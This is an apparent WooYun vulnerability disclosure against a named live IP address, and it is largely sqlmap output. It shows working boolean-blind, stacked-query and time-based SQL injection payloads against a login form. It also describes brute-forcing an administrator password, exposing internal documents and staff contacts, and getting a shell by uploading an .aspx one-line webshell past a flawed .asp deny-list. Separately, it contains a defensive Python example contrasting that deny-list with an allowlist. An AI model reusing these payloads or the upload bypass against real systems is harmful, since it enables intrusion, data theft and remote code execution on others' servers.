WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles online--------http://drop.zone.ci/
2015-04-12: Details reported to the vendor, awaiting vendor response. 2015-04-17: The vendor chose to ignore the vulnerability; details are now public.
fen
http://123.234.41.55/ The username field is injectable, but entering an arbitrary password still does not get you into the system. The two checks are evidently separate: the injected query pulls back some user record, and the login succeeds only if the supplied password matches that record's password. So brute-forcing or guessing the password is all that is needed.
First, the injection #1
[root@Hacker~]# Sqlmap -u "123.234.41.55" --data "txtName=aaaa"

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:58:34

[12:58:34] [INFO] parsing HTTP request from '1.txt'
[12:58:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnTpTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7MriIgbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x7EL7NWPQYxGA==&txtName=aaaa%' AND 5875=5875 AND '%'='&txtPwd=aaaaaa&txtCode=krp&bthLogin.x=64&bthLogin.y=10

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnTpTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7MriIgbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x7EL7NWPQYxGA==&txtName=aaaa%'; WAITFOR DELAY '0:0:5';--&txtPwd=aaaaaa&txtCode=kpi&bthLogin.x=64&bthLogin.y=10

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnTpTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7MriIgbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x7EL7NWPQYxGA==&txtName=aaaa%' WAITFOR DELAY '0:0:5'--&txtPwd=aaaaaa&txtCode=krp&bthLogin.x=64&bthLogin.y=10
---
[12:58:35] [INFO] testing MySQL
[12:58:35] [WARNING] the back-end DBMS is not MySQL
[12:58:35] [INFO] testing Oracle
[12:58:35] [WARNING] the back-end DBMS is not Oracle
[12:58:35] [INFO] testing PostgreSQL
[12:58:35] [WARNING] the back-end DBMS is not PostgreSQL
[12:58:35] [INFO] testing Microsoft SQL Server
[12:58:36] [INFO] confirming Microsoft SQL Server
[12:58:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2000
[12:58:37] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 2 times
[12:58:37] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[12:58:37] [INFO] fetched data logged to text files under 'F:\1937CN~1\VStart50tools\????\SQLMAP~2\Bin\output\123.234.41.55'

[*] shutting down at 12:58:37

[root@Hacker~]# Sqlmap
Injection confirmed #2 Brute-forcing the password
After logging in, look at the privileges. This is a high-privilege account brute-forced later on; it can approve leave requests, ha
All kinds of internal meeting, technical and core documents
Internal staff contact details
#3 getshell: "My Work Plan". Once a plan has been created you can reply to it, and the reply accepts arbitrary file uploads. .asp is blocked, yet .aspx is not
One-line webshell
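The upload filter described above, as an added example that is not the target's code. The report says .asp is rejected while .aspx goes through, and on the stack sqlmap fingerprinted (IIS 7.5, ASP.NET 4.0.30319) .aspx is exactly the extension the server executes, so a deny-list of that shape stops nothing. The deny-list's contents, the allowlist of document types a work-plan attachment would need, and the file names tested are all assumptions.

```python
"""Extension deny-list as the report describes it, beside an allowlist that
ignores the client's file name entirely. File names below are constructed."""
import os
import secrets

# Assumed form of the vulnerable filter: a deny-list that names .asp only.
DENY = {".asp"}


def blacklist_allows(filename):
    """The flawed check: True means the upload is accepted."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENY


# Assumed allowlist for a work-plan attachment: documents only, never code.
ALLOW = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".txt"}


def allowlist_accept(filename):
    """Return a server-chosen storage name, or None to reject.

    Rejects path components, NUL bytes, anything not on the allowlist and any
    name with more than one dot (so 'x.aspx.pdf' or 'x.asp;.jpg' never reach
    the handler-mapping logic), and never reuses the client's name on disk."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or "\x00" in base:
        return None
    root, ext = os.path.splitext(base)
    ext = ext.lower()
    if not root or "." in root or ext not in ALLOW:
        return None
    # Random name: the attacker controls neither the path nor the extension.
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name in ["plan.asp", "plan.aspx", "plan.ashx", "plan.asp;.jpg",
                 "../plan.pdf", "web.config", "Plan.DOCX"]:
        print("%-14s deny-list: %-5s allowlist: %s"
              % (name, blacklist_allows(name), allowlist_accept(name)))
```

Store the renamed file outside the web root and serve it through a download handler that sets Content-Disposition: attachment; then even an allowlisted extension cannot be executed if the handler mappings on the server are later changed.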
This puts the intranet at risk. I did not go any further with the 2008 server - -
Back-end SQL injection, plus the weak passwords in use by users
Severity: No impact (vendor ignored)
Ignored on: 2015-04-17 21:44
Vulnerability Rank: 15 (WooYun rating)
None